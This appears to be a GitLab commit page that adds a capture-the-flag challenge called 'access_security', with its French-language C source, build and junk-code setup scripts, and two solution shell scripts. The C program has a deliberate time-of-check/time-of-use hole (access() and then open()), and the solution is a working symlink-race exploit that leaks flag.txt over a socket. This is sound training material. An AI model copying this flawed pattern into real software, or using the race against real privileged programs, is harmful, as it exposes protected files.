Commit 3954c141 authored by GovanifY's avatar GovanifY
Browse files

access_security done

parent af43e35d
......@@ -13,8 +13,8 @@ challenges done:
* web_server
* snake_oil
* snake_oil_2
* access_security
TODO:
* web_server_2
* access_security
* modern_rop
all:
gcc -w main.c -o access_security
strip access_security
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdbool.h>
#include <stdint.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
//--JUNK CODE--
//--JUNK CODE--
int main(int argc, char **argv)
{
char *file;
char *host;
file = argv[1];
host = argv[2];
if(access(argv[1], R_OK) == 0) {
int fd;
int ffd;
int rc;
struct sockaddr_in sin;
char buffer[4096];
printf("Connection à %s... ", host); fflush(stdout);
fd = socket(AF_INET, SOCK_STREAM, 0);
memset(&sin, 0, sizeof(struct sockaddr_in));
sin.sin_family = AF_INET;
//--JUNK CODE--
//--JUNK CODE--
sin.sin_addr.s_addr = inet_addr(host);
sin.sin_port = htons(1337);
if(connect(fd, (void *)&sin, sizeof(struct sockaddr_in)) == -1) {
printf("Impossible de se connecter\n");
exit(EXIT_FAILURE);
}
#define HITHERE "SCP PROTOCOL REIMPLEMENTATION\n---TOP SECRET---\n"
//--JUNK CODE--
//--JUNK CODE--
if(write(fd, HITHERE, strlen(HITHERE)) == -1) {
exit(EXIT_FAILURE);
}
#undef HITHERE
printf("Connecté!\nOn envois le fichier...\n"); fflush(stdout);
ffd = open(file, O_RDONLY);
if(ffd == -1) {
exit(EXIT_FAILURE);
}
//--JUNK CODE--
//--JUNK CODE--
rc = read(ffd, buffer, sizeof(buffer));
if(rc == -1) {
exit(EXIT_FAILURE);
}
write(fd, buffer, rc);
} else {
printf("PIRATAGE DETECTE\n");
}
}
import subprocess
import os
import sys
import shutil
from colorama import Fore, Back, Style
# chals_out/chal_name/team_name so 3
sys.path.insert(1, os.path.join(sys.path[0], '../../..'))
from libchals import *
FNULL = open(os.devnull, 'w')
# junk code generation
write_junk_calls("main.c", 64, 3)
write_junk_calls("main.c", 50, 3)
write_junk_body("main.c", 14)
subprocess.call("make", stdout=FNULL, stderr=FNULL)
# testing this binary is a pain because race condition and is unlikely to fail
# anyways, so we don't
os.remove("main.c")
os.remove("Makefile")
os.remove("setup.py")
shutil.rmtree("solution")
#!/bin/sh
touch has_perms
touch /tmp/hackfile
while true; do
ln -sf has_perms /tmp/race
ln -sf flag.txt /tmp/race
done
#!/bin/sh
while true; do
./access_security /tmp/race 127.0.0.1
done
Markdown is supported
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment